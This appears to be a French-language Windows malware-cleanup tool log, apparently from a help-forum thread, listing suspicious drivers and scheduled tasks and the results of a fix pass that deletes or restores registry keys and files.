S3 Denuvo Kuser Data Driver 1.0.0.7; pas de ImagePath
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 0000-00-00] ()
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider)
S3 AscFileControl; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileControl.sys [X]
S3 AscFileFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscFileFilter.sys [X]
S3 AscRegistryFilter; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\win7_amd64\AscRegistryFilter.sys [X]
S3 iobit_monitor_server; \??\C:\Program Files (x86)\IObit\Advanced SystemCare\drivers\Monitor_win7_x64.sys [X]
U3 MBAMService; pas de ImagePath
2019-06-29 11:34 - 2019-07-02 09:16 - 000003184 _____ C:\Windows\System32\Tasks\csrss
2019-06-29 11:34 - 2019-06-29 11:34 - 000002890 _____ C:\Windows\System32\Tasks\ewSXxaflLkNov2
2019-06-29 11:15 - 2019-06-29 11:15 - 000000000 ____D C:\Windows\SysWOW64\yzrnpmcu
2019-06-29 11:15 C:\Windows\SysWOW64\yzrnpmcu
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Pas de fichier
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\nathan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe () -> %SNP%
AlternateDataStreams: C:\Users\nathan\AppData\Local\Temp:$DATA [16]
EmptyTemp:
*****************
Le Point de restauration a été créé avec succès.
Processus fermé avec succès.
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => non trouvé(e)
"HKU\S-1-5-21-3514000543-3983533879-240645468-1000\Software\Microsoft\Windows\CurrentVersion\Run\\CloudNet" => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{1cdbc928-7ae7-11e8-8f04-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{77299983-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{7729998e-6ef2-11e8-8724-309c237de986} => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Classes\CLSID\{bc299b7e-6fe0-11e8-9ffc-309c237de986} => non trouvé(e)
HKLM\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96} => non trouvé(e)
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => valeur restauré(es) avec succès
"C:\Windows\system32\GroupPolicy\Machine" => non trouvé(e)
HKLM\SOFTWARE\Policies\Google => non trouvé(e)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Smart Defrag_is1 => non trouvé(e)
HKCU\SOFTWARE\BDEsoft => non trouvé(e)
HKU\S-1-5-21-3514000543-3983533879-240645468-1000\SOFTWARE\BDEsoft => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{0B98273D-9B99-44A9-98D8-B41F26CE4046}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{21556817-0DD1-421B-ACAC-7DA2C68F5990}D:\jeux\fifa18\fifa18.exe" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{ECC86769-7F66-4B10-8F5C-9236014AD6C2}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EA422745-2A59-4210-9170-FC0F681D690D}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B9306A65-8495-4668-896A-47A6EBC63B64}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{35C516B9-33DB-4BC7-97D5-E2FA37E346B5}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B46674A1-E065-4ED0-B455-C03D8FCF3124}" => non trouvé(e)
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0DE91D78-08C0-4B2A-8131-6D960DF45E00}" => non trouvé(e)
"C:\Windows\Installer\57f7ee1.msi" => non trouvé(e)
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
HKLM\Software\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32 => non trouvé(e)
"C:\Windows\system32\drivers\8f00b204e9800998.sys" => a été déverrouillé
HKLM\SYSTEM\CurrentControlSet\Services\8f00b204e9800998 => impossible à supprimer, clé était peut-être protégé(e)